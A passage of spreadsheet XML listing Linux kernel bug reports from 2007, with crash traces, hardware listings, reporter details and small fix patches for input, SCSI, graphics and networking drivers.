2007-09-30 13:59:54.106772825 &lt;4&gt;[65733.031841] [&lt;ffffffff80247af0&gt;] autoremove_wake_function+0x0/0x40 2007-09-30 13:59:54.106774571 &lt;4&gt;[65733.031870] [&lt;ffffffff80244240&gt;] worker_thread+0x0/0x130 2007-09-30 13:59:54.106785746 &lt;4&gt;[65733.031882] [&lt;ffffffff802476ed&gt;] kthread+0x4d/0x80 2007-09-30 13:59:54.106787492 &lt;4&gt;[65733.031908] [&lt;ffffffff8020aa78&gt;] child_rip+0xa/0x12 2007-09-30 13:59:54.106789099 &lt;4&gt;[65733.031980] [&lt;ffffffff802476a0&gt;] kthread+0x0/0x80 2007-09-30 13:59:54.106790705 &lt;4&gt;[65733.031989] [&lt;ffffffff8020aa6e&gt;] child_rip+0x0/0x12 2007-09-30 13:59:54.106792312 &lt;4&gt;[65733.032007] 2007-09-30 13:59:54.106793708 &lt;4&gt;[65733.032013] 2007-09-30 13:59:54.106798667 &lt;4&gt;[65733.032014] Code: f0 ff 0f 79 09 f3 90 83 3f 00 7e f9 eb f2 c9 c3 66 66 66 2e 2007-09-30 13:59:54.106800483 &lt;1&gt;[65733.032030] RIP [&lt;ffffffff8063a6e4&gt;] _spin_lock+0x4/0x20 2007-09-30 13:59:54.106802159 &lt;4&gt;[65733.032035] RSP &lt;ffff81003e5fddc0&gt; 2007-09-30 13:59:54.106803626 &lt;0&gt;[65733.032038] CR2: 0000000000000640</t>
  </si>
  <si>
    <t>hid-input.c lacks key codes for microsoft presenter mouse 8000 in presentation mode</t>
  </si>
  <si>
    <t>2007-10-01 09:59 UTC</t>
  </si>
  <si>
    <t>Alan Campbell</t>
  </si>
  <si>
    <t>2012-05-17 14:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None Distribution:ubuntu7.04 Hardware Environment:microsoft wireless notebook presenter mouse 8000 Software Environment: Problem Description: presentation mode buttons don't work due to missing mapping in hid-input.c Problem Fix: add following mapping in case HID_UP_MSVENDOR in hid-input.c case HID_UP_MSVENDOR: switch (usage-&gt;hid &amp; HID_USAGE) { case 0x000: goto ignore; case 0xfd08: map_key_clear(KEY_PAGEDOWN); break; case 0xfd09: map_key_clear(KEY_PAGEUP); break; case 0xfd0b: map_key_clear(KEY_PLAYPAUSE); break; default: goto ignore; } break; Steps to reproduce:</t>
  </si>
  <si>
    <t>kernel oops when unplugging usb mouse, sometimes hardlock when moving mouse</t>
  </si>
  <si>
    <t>2.6.23.rc4 - rc9 (vanilla)</t>
  </si>
  <si>
    <t>2007-10-02 05:34 UTC</t>
  </si>
  <si>
    <t>o. meijer</t>
  </si>
  <si>
    <t>2008-01-27 14:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22.6 Distribution:ubuntu 7.04, custom vanilla kernel Hardware Environment: Laptop NX5000 Software Environment:Linux, X Problem Description: When using the evdev driver in xorg, see snippet of xorg.conf,a kernel oops occurs when unplugging the mouse. Steps to reproduce: Low latency dektop, always when unplugging the mouse(both, Logitech+microsoft wireless), hard locks randomly but not very often when moving the mouse. (the problem only occurs when using the xorg-evdev-driver) snippet of xorg.conf: Section "InputDevice" Identifier "Logitech" Driver "evdev" Option "evBits" "+1-2" Option "keyBits" "~272-287" Option "relBits" "~0-2 ~6 ~8" Option "Pass" "3" EndSection Output of Oops: usb 1-2.2: USB disconnect, address 5 BUG: unable to handle kernel paging request at virtual address 00100100 printing eip: c028a241 *pde = 26959067 *pte = 00000000 Oops: 0000 [#1] PREEMPT Modules linked in: snd_intel8x0m xt_tcpudp i915 drm nf_conntrack_ipv4 xt_state nf_conntrack iptable_filter ip_tables x_tables ipv6 ppdev speedstep_centrino cpufreq_conservative cpufreq_performance cpufreq_ondemand freq_table cpufreq_powersave sbp2 scsi_mod lp fuse usblp af_packet snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss pcmcia snd_seq_midi snd_rawmidi snd_seq_midi_event ohci1394 snd_seq ide_cd snd_timer ieee1394 b44 mii ipw2200 joydev cdrom snd_seq_device yenta_socket rsrc_nonstatic ieee80211 ieee80211_crypt pcmcia_core snd 8250_pci soundcore snd_page_alloc button ehci_hcd serio_raw parport_pc parport uhci_hcd 8250_pnp 8250 serial_core intel_agp pcspkr unix vfat fat CPU: 0 EIP: 0060:[&lt;c028a241&gt;] Not tainted VLI EFLAGS: 00010206 (2.6.23-rc9-om-v3.14 #1) EIP is at evdev_disconnect+0x91/0xd0 eax: 00000000 ebx: 000ffcf0 ecx: ef7b4000 edx: 00000033 esi: eed2724c edi: eed27200 ebp: eed27254 esp: ef7b5e84 ds: 007b es: 007b fs: 0000 gs: 0000 ss: 0068 Process khubd (pid: 185, ti=ef7b4000 task=ef791ab0 task.ti=ef7b4000) Stack: eed73a00 ecaa8f58 ecaa8800 ecaa8f6c ec36b458 c0287f76 00000000 c039bea0 ec36b458 c0273dfe ec3e6c58 ec71ab40 ec3e6c58 c02959d1 ec7b1000 ec3e6000 c039bea0 c0299319 eece2e00 eece2e1c c0277368 eece2e1c c039bed0 eece2e84 Call Trace: [&lt;c0287f76&gt;] input_unregister_device+0x86/0x120 [&lt;c0273dfe&gt;] usb_kill_urb+0x4e/0x100 [&lt;c02959d1&gt;] hidinput_disconnect+0x41/0x60 [&lt;c0299319&gt;] hid_disconnect+0xb9/0xd0 [&lt;c0277368&gt;] usb_unbind_interface+0x38/0x90 [&lt;c025a0a4&gt;] __device_release_driver+0x64/0xa0 [&lt;c025a4dd&gt;] device_release_driver+0x1d/0x40 [&lt;c025999d&gt;] bus_remove_device+0x4d/0x80 [&lt;c0257e1a&gt;] device_del+0x12a/0x240 [&lt;c0274838&gt;] usb_disable_device+0x78/0xe0 [&lt;c02705e4&gt;] usb_disconnect+0x94/0x100 [&lt;c0270a29&gt;] hub_thread+0x239/0xc40 [&lt;c012d8a0&gt;] autoremove_wake_function+0x0/0x50 [&lt;c02707f0&gt;] hub_thread+0x0/0xc40 [&lt;c012d582&gt;] kthread+0x42/0x70 [&lt;c012d540&gt;] kthread+0x0/0x70 [&lt;c01044ff&gt;] kernel_thread_helper+0x7/0x18 ======================= Code: 00 00 00 8d bc 27 00 00 00 00 8d 83 08 04 00 00 b9 06 00 02 00 ba 1d 00 00 00 e8 ab 5e ee ff 8b 9b 10 04 00 00 81 eb 10 04 00 00 &lt;8b&gt; 83 10 04 00 00 0f 18 00 90 8d 83 10 04 00 00 39 f0 75 cb 8d EIP: [&lt;c028a241&gt;] evdev_disconnect+0x91/0xd0 SS:ESP 0068:ef7b5e84 meijero@meijero-laptop:~$ lspci: meijero@meijero-laptop:/proc$ lspci 00:00.0 Host bridge: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.1 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.3 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:02.1 Display controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 01) 00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 01) 00:1d.2 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 01) 00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 01) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 81) 00:1f.0 ISA bridge: Intel Corporation 82801DBM (ICH4-M) LPC Interface Bridge (rev 01) 00:1f.1 IDE interface: Intel Corporation 82801DBM (ICH4-M) IDE Controller (rev 01) 00:1f.5 Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 01) 00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller (rev 01) 01:04.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05) 01:06.0 CardBus bridge: Texas Instruments PCI7420 CardBus Controller 01:06.1 CardBus bridge: Texas Instruments PCI7420 CardBus Controller 01:0d.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 01:0e.0 Ethernet controller: Broadcom Corporation BCM4401-B0 100Base-TX (rev 02) meijero@meijero-laptop:/proc$</t>
  </si>
  <si>
    <t>2.6.23-rc9 boot failure (megaraid?)</t>
  </si>
  <si>
    <t>2.6.23-rc9</t>
  </si>
  <si>
    <t>2007-10-02 12:37 UTC</t>
  </si>
  <si>
    <t>2007-10-05 14:44 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/10/2/243 Last known good : 2.6.22.9 Submitter : Burton Windle &lt;bwindle@fint.org&gt; Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Caused-By : FUJITA Tomonori &lt;fujita.tomonori@lab.ntt.co.jp&gt; commit 3f6270ef76f2ce5c134615a470685d6c2a66c07e [SCSI] megaraid_old: convert to use the data buffer accessors</t>
  </si>
  <si>
    <t>kernel BUG at arch/i386/mm/highmem.c:15!  on 2.6.23-rc8/rc9</t>
  </si>
  <si>
    <t>2.6.23-rc8/rc9</t>
  </si>
  <si>
    <t>2007-10-04 14:02 UTC</t>
  </si>
  <si>
    <t>2007-10-05 14:41 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/10/4/61 Submitter : gurudas pai &lt;gurudas.pai@oracle.com&gt; Handled-By : Nick Piggin &lt;nickpiggin@yahoo.com.au&gt; Hugh Dickins &lt;hugh@veritas.com&gt; Patch : http://lkml.org/lkml/2007/10/4/256</t>
  </si>
  <si>
    <t>PF_KEY SADB_GET messages return SADB_DUMP from the kernel</t>
  </si>
  <si>
    <t>2007-10-05 09:01 UTC</t>
  </si>
  <si>
    <t>Charles Hardin</t>
  </si>
  <si>
    <t>2008-09-24 07:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Centos 5 Hardware Environment: Dell 490 Software Environment: Centos 5 Problem Description: Sending an SADB_GET to the PF_KEY socket returns an SADB_DUMP in the out_hdr Steps to reproduce: Send an SADB_GET to the PF_KEY socket and dump the returned packet This patch should fix the problem diff --git a/net/key/af_key.c b/net/key/af_key.c index 5502df1..7a5e993 100644 --- a/net/key/af_key.c +++ b/net/key/af_key.c @@ -1546,7 +1546,7 @@ static int pfkey_get(struct sock *sk, struct sk_buff *skb, out_hdr = (struct sadb_msg *) out_skb-&gt;data; out_hdr-&gt;sadb_msg_version = hdr-&gt;sadb_msg_version; - out_hdr-&gt;sadb_msg_type = SADB_DUMP; + out_hdr-&gt;sadb_msg_type = SADB_GET; out_hdr-&gt;sadb_msg_satype = pfkey_proto2satype(proto); out_hdr-&gt;sadb_msg_errno = 0; out_hdr-&gt;sadb_msg_reserved = 0;</t>
  </si>
  <si>
    <t>G33 graphics broken after 2.6.23-rc6</t>
  </si>
  <si>
    <t>2007-10-06 13:32 UTC</t>
  </si>
  <si>
    <t>2007-10-07 04:23 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/10/5/300 http://lkml.org/lkml/2007/10/6/3 Submitter : Matthew Reppert &lt;arashi@sacredchao.net&gt; Handled-By : Kyle McMartin &lt;kyle@mcmartin.ca&gt; Caused-By : Zhenyu Wang &lt;zhenyu.z.wang@intel.com&gt; commit 2a8592f2ebcba86b1127aa889155d58a3dc186ca Fix G33 GTT stolen mem range</t>
  </si>
  <si>
    <t>aacraid driver fails with Dell PowerEdge Expandable RAID Controller 3/Di</t>
  </si>
  <si>
    <t>2007-10-08 10:14 UTC</t>
  </si>
  <si>
    <t>Marcin Krol</t>
  </si>
  <si>
    <t>2009-03-24 09:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.20.4 (see description) Distribution: PLD Linux Distribution 2.0 (Ac) Hardware Environment: Dell PowerEdge 1650 with Dell PowerEdge Expandable RAID Controller 3/Di (rev 01), 2 disks, mirror, PCI ID 1028:000a Problem Description: System does not boot at all using aacraid SCSI driver with Dell PERC 3/Di controller. Machine is currently running kernel 2.6.20.4 and it works perfectly. Few days ago I was trying upgrade to 2.6.22.9 and system failed to boot. Driver correctly detects controller and then following messages are displayed on console: scsi 0:0:0:0 Direct-Access DELL mirror V1.0 PQ: 0 ANSI: 2 AAC:AAC received an unrecognized command [601] aacraid: Host adapter abort request (0,1,0,0) aacraid: Host adapter abort request (0,1,0,0) aacraid: Host adapter reset request. SCSI hang ? scsi 0:1:0:0 scsi: Device offlined - not ready after error recovery ... and so on for every scsi id and scsi host (0:1:1:0, 0:1:2:0, ... , 0:2:15:0). Then system fails with kernel panic: unable to mount root filesystem which is obvious. I wasn't trying to build 2.6.20.x kernel series newer than .4. I've tried 2.6.21.4 and 2.6.22.5 and they failed same way 2.6.22.9 did. Steps to reproduce: try to boot with root fs on machine with Dell PERC 3/Di.</t>
  </si>
  <si>
    <t>thermal driver should take no action but export events to userspace when nocrt is set</t>
  </si>
  <si>
    <t>2007-10-10 11:01 UTC</t>
  </si>
  <si>
    <t>Michal Hrusecky</t>
  </si>
  <si>
    <t>2008-02-10 14:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16 (maybe later) Distribution: vanilla kernel Problem Description: When temperature reaches critical value, kernel generates ACPI event AND calls /sbin/poweroff. I think, that this behaviour isn't right, because: 1) One problem is handled twice 2) Suspend to RAM can be much faster then /sbin/poweroff but it may not work on some computers. 3) I think that correct way is to handle this is in userspace with acpid instead of calling predefined binary from kernel.</t>
  </si>
  <si>
    <t>network does not work after resume from suspend-to-disk</t>
  </si>
  <si>
    <t>2.6.22 2.6.23-rc2 2.6.23</t>
  </si>
  <si>
    <t>2007-10-11 10:40 UTC</t>
  </si>
  <si>
    <t>VDR dai (bugzilla)</t>
  </si>
  <si>
    <t>2008-11-20 03:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21 Distribution: Debian GNU/Linux (unstable) Hardware Environment: MSI 875P Neo (Intel Corporation 82547EI Gigabit Ethernet Controller) Software Environment: uswsusp 0.7-1 Problem Description: If I do s2disk, hibernate is fine. When resuming, in a short time, network does not work until ifdown/ifup eth0. No dmesg and syslog attract my attention, but network is unreachable. Steps to reproduce: 1. boot 2. s2disk 3. press the power button</t>
  </si>
  <si>
    <t>PnPACPI ignores IOAPIC Interrupt Source Overrides</t>
  </si>
  <si>
    <t>up through 2.6.23</t>
  </si>
  <si>
    <t>2007-10-12 13:38 UTC</t>
  </si>
  <si>
    <t>2007-12-03 22:38 UTC</t>
  </si>
  <si>
    <t>This problem has always been present in the PNPACPI code. It has shown up on i386, since PNPACPI was deployed there first. But now that PNPACPI is included in x86_64 by default also, and so the issue will spread there too. The workaround is to boot with "pnpacpi=off" This issue was diagnosed by IBM here: https://bugzilla.novell.com/show_bug.cgi?id=214809 The RTC fails in IOAPIC mode due to mis-programmed IRQ8 polarity. There is an Interrupt Source Override for IRQ8 -- Edge LOW. The legacy mapping implicitly asks for, and the DSDT explicitly asks for, Edge HIGH. Linux first programs IRQ8 according to the Interrupt Source Override -- but PNPACPI later runs and re-programs it according to the DSDT. So, PNPACPI needs to learn about Interupt Source Overrides in IOAPIC mode, and must honor them.</t>
  </si>
  <si>
    <t>2.6.2* libata fails for sis 5513 PATA</t>
  </si>
  <si>
    <t>2007-10-13 03:12 UTC</t>
  </si>
  <si>
    <t>2008-09-09 09:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Distribution: Gentoo Hardware Environment: sis 630 chipset Software Environment: x86 Problem Description: i cannot boot a system with libata only (not old ide driver) i enabled pata_sis and pata_generic support. tried with irqroute and pci=noacpi options, no way. when i try to suspend my notebook i have problems with ide controller. the copy lasts a lot and i get oops with 2.6.17 kernel. Stopping tasks: ==========================================| Shrinking memory... done (22776 pages freed) pnp: Device 00:08 disabled. swsusp: Need to copy 30898 pages ACPI: PCI Interrupt 0000:00:00.1[A]: no GSI - using IRQ 14 eth0: Media Link Off ACPI: PCI Interrupt 0000:00: 01.2[D] -&gt; Link [LNKD] -&gt; GSI 5 (level, low) -&gt; IRQ 5 ACPI: PCI Interrupt 0000:00:01.3[D] -&gt; Link [LNKD] -&gt; GSI 5 (level, low) -&gt; IRQ 5 ACPI: PCI Interrupt 0000:00:01.4[B] -&gt; Link [LNKB] -&gt; GSI 5 (level, low) -&gt; IRQ 5 ACPI: PCI Interrupt 0000:00:01.6[B] -&gt; Link [LNKB] -&gt; GSI 5 (level, low) -&gt; IRQ 5 PCI: Setting latency timer of device 0000:00:02.0 to 64 PM: Writing back config space on device 0000:00:0a.0 at offset 1 (was 82100003, writing 82100007) ACPI: PCI Interrupt 0000:00:0a.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 PM: Writing back config space on device 0000:00:0a.1 at offset 1 (was 2100003, writing 82100007) ACPI: PCI Interrupt 0000:00: 0a.1[B] -&gt; Link [LNKC] -&gt; GSI 5 (level, low) -&gt; IRQ 5 pnp: Device 00:08 activated. pnp: Failed to activate device 00:0c. pnp: Failed to activate device 00:0d. irq 14: nobody cared (try booting with the "irqpoll" option) &lt;c012c987&gt; __report_bad_irq+0x2b/0x69 &lt;c012cb3d&gt; note_interrupt+0x178/0x1a7 &lt;c012c53d&gt; handle_IRQ_event+0x22/0x4e &lt;c012c5ce&gt; __do_IRQ+0x65/0x8f &lt;c0104b2d&gt; do_IRQ+0x19/0x24 &lt;c01033da&gt; common_interrupt+0x1a/0x20 &lt;c0118f4b&gt; __do_softirq+0x2c/0x7f &lt;c0118fc0&gt; do_softirq+0x22/0x26 &lt;c0104b32&gt; do_IRQ+0x1e/0x24 &lt;c01033da&gt; common_interrupt+0x1a/0x20 &lt;c0214224&gt; acpi_processor_idle+0x157/0x323 &lt;c0101da2&gt; cpu_idle+0x3a/0x4f &lt;c03b0635&gt; start_kernel+0x29c/0x29e handlers: [&lt;c0230301&gt;] (ide_intr+0x0/0x16c) Disabling IRQ #14 Restarting tasks... done hda: dma_timer_expiry: dma status == 0x24 hda: DMA interrupt recovery hda: lost interrupt tried 2.6.18-rc4-mm3 (as suggested by Rafael J. Wysocki) as soon as i ask for suspending i get a black screen. waiting for lots of time...something like 1 min i see: Disabling Interrupt #14 and after, even waiting some mins...nothing more. i have to power off manually. tried 2.6.18-rc5 i immediatly have a Disabling Interrupt #14 message (instead of waiting like mm3) but i get a panic too (i'll try to attach a photo of that) seems related to synapsis driver....maybe input team should be CC. CPU0 0: 431861 XT-PIC timer 1: 638 XT-PIC i8042 2: 0 XT-PIC cascade 5: 0 XT-PIC yenta, ohci_hcd:usb1, ohci_hcd:usb2, Trident Audio, SiS630, eth0 7: 0 XT-PIC parport0 8: 2 XT-PIC rtc 9: 1 XT-PIC acpi 11: 0 XT-PIC yenta 12: 10982 XT-PIC i8042 14: 200771 XT-PIC ide0 15: 26 XT-PIC ide1 NMI: 0 LOC: 0 ERR: 0 MIS: 0 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 630 Host (rev 11) 00:00.1 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) 00:01.0 ISA bridge: Silicon Integrated Systems [SiS] SiS85C503/5513 (LPC Bridge) 00:01.1 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 80) 00:01.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) 00:01.3 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) 00:01.4 Multimedia audio controller: Silicon Integrated Systems [SiS] SiS PCI Audio Accelerator (rev 01) 00:01.6 Modem: Silicon Integrated Systems [SiS] AC'97 Modem Controller (rev a0) 00:02.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) 00:0a.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev 80) 00:0a.1 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev 80) 01:00.0 VGA compatible controller: Silicon Integrated Systems [SiS] 630/730 PCI/AGP VGA Display Adapter (rev 11)</t>
  </si>
  <si>
    <t>kernel oops in firewire_ohci (sparc64 DMA mapping)</t>
  </si>
  <si>
    <t>2007-10-13 12:44 UTC</t>
  </si>
  <si>
    <t>seraph@xs4all.nl</t>
  </si>
  <si>
    <t>2007-12-22 05:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22.9 Distribution: Gentoo Hardware Environment: Sparc64 (Blade 100 UltraSPARC 2e) Software Environment: Problem Description: I found a kernel oops in /var/log/messages after booting both my Blade 100s. The oops appears to have triggered by firewire_ohci, but I'm no kernel hacker and could be mistaken. Here is the text of one of them. The one from the other machine is identical except for the timestamps and machine name. Oct 13 20:26:04 succubus OOPS: Bogus kernel PC [0000000000000000] in fault handler Oct 13 20:26:04 succubus OOPS: RPC [0000000010068cd0] Oct 13 20:26:04 succubus RPC: &lt;ar_context_add_page+0xd8/0x160 [firewire_ohci]&gt; Oct 13 20:26:04 succubus OOPS: Fault was to vaddr[1004e000] Oct 13 20:26:04 succubus Call Trace: Oct 13 20:26:04 succubus [00000000004076f4] sparc64_realfault_common+0x18/0x20 Oct 13 20:26:04 succubus [0000000010068cd0] ar_context_add_page+0xd8/0x160 [firewire_ohci] Oct 13 20:26:04 succubus [0000000010068d90] ar_context_init+0x38/0x60 [firewire_ohci] Oct 13 20:26:04 succubus [000000001006ac50] pci_probe+0xf8/0x340 [firewire_ohci] Oct 13 20:26:04 succubus [00000000005299bc] pci_device_probe+0x64/0xa0 Oct 13 20:26:04 succubus [0000000000550a28] driver_probe_device+0x90/0x1c0 Oct 13 20:26:04 succubus [0000000000550bc0] __driver_attach+0x68/0x80 Oct 13 20:26:04 succubus [000000000054fe5c] bus_for_each_dev+0x44/0x80 Oct 13 20:26:04 succubus [0000000000550218] bus_add_driver+0x80/0x1c0 Oct 13 20:26:04 succubus [0000000000529b7c] __pci_register_driver+0x44/0xa0 Oct 13 20:26:04 succubus [000000000047d5cc] sys_init_module+0x134/0x1400 Oct 13 20:26:04 succubus [0000000000406094] linux_sparc_syscall32+0x3c/0x40 Oct 13 20:26:04 succubus [00000000000133d8] 0x133e0 Oct 13 20:26:04 succubus Unable to handle kernel NULL pointer dereference Oct 13 20:26:04 succubus tsk-&gt;{mm,active_mm}-&gt;context = 00000000000001f9 Oct 13 20:26:04 succubus tsk-&gt;{mm,active_mm}-&gt;pgd = fffff8004f9f8000 Oct 13 20:26:04 succubus \|/ ____ \|/ Oct 13 20:26:04 succubus "@'/ .. \`@" Oct 13 20:26:04 succubus /_| \__/ |_\ Oct 13 20:26:04 succubus \__U_/ Oct 13 20:26:04 succubus modprobe(648): Oops [#1] Oct 13 20:26:04 succubus TSTATE: 0000001911009601 TPC: 0000000000000000 TNPC: 0000000000000004 Y: 00000000 Not tainted Oct 13 20:26:04 succubus TPC: &lt;0x8&gt; Oct 13 20:26:04 succubus g0: 0000000000470a40 g1: 00000000005d2b28 g2: 0000000000000000 g3: 0000000000000000 Oct 13 20:26:04 succubus g4: fffff8004f393480 g5: 0000000000000098 g6: fffff8004fa74000 g7: 00c06500180065c0 Oct 13 20:26:04 succubus o0: fffff8004effb870 o1: 00000000c0650000 o2: 0000000000002000 o3: 0000000000000000 Oct 13 20:26:04 succubus o4: 0000000000000004 o5: 000001ff00420000 sp: fffff8004fa76e71 ret_pc: 0000000010068cd0 Oct 13 20:26:04 succubus RPC: &lt;ar_context_add_page+0xd8/0x160 [firewire_ohci]&gt; Oct 13 20:26:04 succubus l0: fffff8004fba4000 l1: 00000000c0650000 l2: fffff8004effb870 l3: fffff8004f608d90 Oct 13 20:26:04 succubus l4: 000000000063cc00 l5: 0000000000ff0000 l6: fffff8004fa776e0 l7: fffffffffffffff0 Oct 13 20:26:04 succubus i0: 000000000000ff00 i1: 0000000010069cc0 i2: fffff8004f608d90 i3: 0000000000000000 Oct 13 20:26:04 succubus i4: 0000000000000040 i5: 0000000000000000 i6: fffff8004fa76f31 i7: 0000000010068d90 Oct 13 20:26:04 succubus I7: &lt;ar_context_init+0x38/0x60 [firewire_ohci]&gt; Oct 13 20:26:04 succubus Caller[0000000010068d90]: ar_context_init+0x38/0x60 [firewire_ohci] Oct 13 20:26:04 succubus Caller[000000001006ac50]: pci_probe+0xf8/0x340 [firewire_ohci] Oct 13 20:26:04 succubus Caller[00000000005299bc]: pci_device_probe+0x64/0xa0 Oct 13 20:26:04 succubus Caller[0000000000550a28]: driver_probe_device+0x90/0x1c0 Oct 13 20:26:04 succubus Caller[0000000000550bc0]: __driver_attach+0x68/0x80 Oct 13 20:26:04 succubus Caller[000000000054fe5c]: bus_for_each_dev+0x44/0x80 Oct 13 20:26:04 succubus Caller[0000000000550218]: bus_add_driver+0x80/0x1c0 Oct 13 20:26:04 succubus Caller[0000000000529b7c]: __pci_register_driver+0x44/0xa0 Oct 13 20:26:04 succubus Caller[000000000047d5cc]: sys_init_module+0x134/0x1400 Oct 13 20:26:04 succubus Caller[0000000000406094]: linux_sparc_syscall32+0x3c/0x40 Oct 13 20:26:04 succubus Caller[00000000000133d8]: 0x133e0 Oct 13 20:26:04 succubus Instruction DUMP: 01000000 01000000 01000000 &lt;1&gt;Unable to handle kernel NULL pointer dereference Oct 13 20:26:04 succubus tsk-&gt;{mm,active_mm}-&gt;context = 00000000000001f9 Oct 13 20:26:04 succubus tsk-&gt;{mm,active_mm}-&gt;pgd = fffff8004f9f8000 Oct 13 20:26:04 succubus \|/ ____ \|/ Oct 13 20:26:04 succubus "@'/ .. \`@" Oct 13 20:26:04 succubus /_| \__/ |_\ Oct 13 20:26:04 succubus \__U_/ Oct 13 20:26:04 succubus modprobe(648): Oops [#2] Oct 13 20:26:04 succubus TSTATE: 0000004480009605 TPC: 0000000000428a5c TNPC: 0000000000428a60 Y: 00000000 Tainted: G D Oct 13 20:26:04 succubus TPC: &lt;instruction_dump+0x44/0xa0&gt; Oct 13 20:26:04 succubus g0: 78745f6164645f70 g1: 000000000063def0 g2: 0000000000000000 g3: 000000000063dc00 Oct 13 20:26:04 succubus g4: fffff8004f393480 g5: 0000000000000098 g6: fffff8004fa74000 g7: 000000000063def0 Oct 13 20:26:04 succubus o0: 00000000006050d0 o1: 000000000000003c o2: 0000000001000000 o3: 000000000000003e Oct 13 20:26:04 succubus o4: 0000000010068d90 o5: 000000000068d168 sp: fffff8004fa76aa1 ret_pc: 0000000000428a80 Oct 13 20:26:04 succubus RPC: &lt;instruction_dump+0x68/0xa0&gt; Oct 13 20:26:04 succubus l0: 0000000000000000 l1: 0000000000605000 l2: 0000000000000000 l3: 0000001911009601 Oct 13 20:26:04 succubus l4: 0000000000000000 l5: 000000000063dc00 l6: 000000000063dc00 l7: 0000000000000000 Oct 13 20:26:04 succubus i0: 0000000000000000 i1: 00000000000133e0 i2: fffff8004fa775d0 i3: 0000000000000000 Oct 13 20:26:04 succubus i4: 00000000000000ff i5: 000000000000000b i6: fffff8004fa76b61 i7: 00000000004294b8 Oct 13 20:26:04 succubus I7: &lt;die_if_kernel+0x160/0x2c0&gt; Oct 13 20:26:04 succubus Caller[00000000004294b8]: die_if_kernel+0x160/0x2c0 Oct 13 20:26:04 succubus Caller[000000000044d130]: unhandled_fault+0x78/0xe0 Oct 13 20:26:04 succubus Caller[00000000004076f4]: sparc64_realfault_common+0x18/0x20 Oct 13 20:26:04 succubus Caller[0000000010068cd0]: ar_context_add_page+0xd8/0x160 [firewire_ohci] Oct 13 20:26:04 succubus Caller[0000000010068d90]: ar_context_init+0x38/0x60 [firewire_ohci] Oct 13 20:26:04 succubus Caller[000000001006ac50]: pci_probe+0xf8/0x340 [firewire_ohci] Oct 13 20:26:04 succubus Caller[00000000005299bc]: pci_device_probe+0x64/0xa0 Oct 13 20:26:04 succubus Caller[0000000000550a28]: driver_probe_device+0x90/0x1c0 Oct 13 20:26:04 succubus Caller[0000000000550bc0]: __driver_attach+0x68/0x80 Oct 13 20:26:04 succubus Caller[000000000054fe5c]: bus_for_each_dev+0x44/0x80 Oct 13 20:26:04 succubus Caller[0000000000550218]: bus_add_driver+0x80/0x1c0 Oct 13 20:26:04 succubus Caller[0000000000529b7c]: __pci_register_driver+0x44/0xa0 Oct 13 20:26:04 succubus Caller[000000000047d5cc]: sys_init_module+0x134/0x1400 Oct 13 20:26:04 succubus Caller[0000000000406094]: linux_sparc_syscall32+0x3c/0x40 Oct 13 20:26:04 succubus Caller[00000000000133d8]: 0x133e0 Oct 13 20:26:04 succubus Instruction DUMP: 80a42000 12480005 9610203e &lt;d4060000&gt; 4000cf10 a0102001 833c2000 901460d0 83287002</t>
  </si>
  <si>
    <t>2007-10-14 03:04 UTC</t>
  </si>
  <si>
    <t>2008-04-01 12:38 UTC</t>
  </si>
  <si>
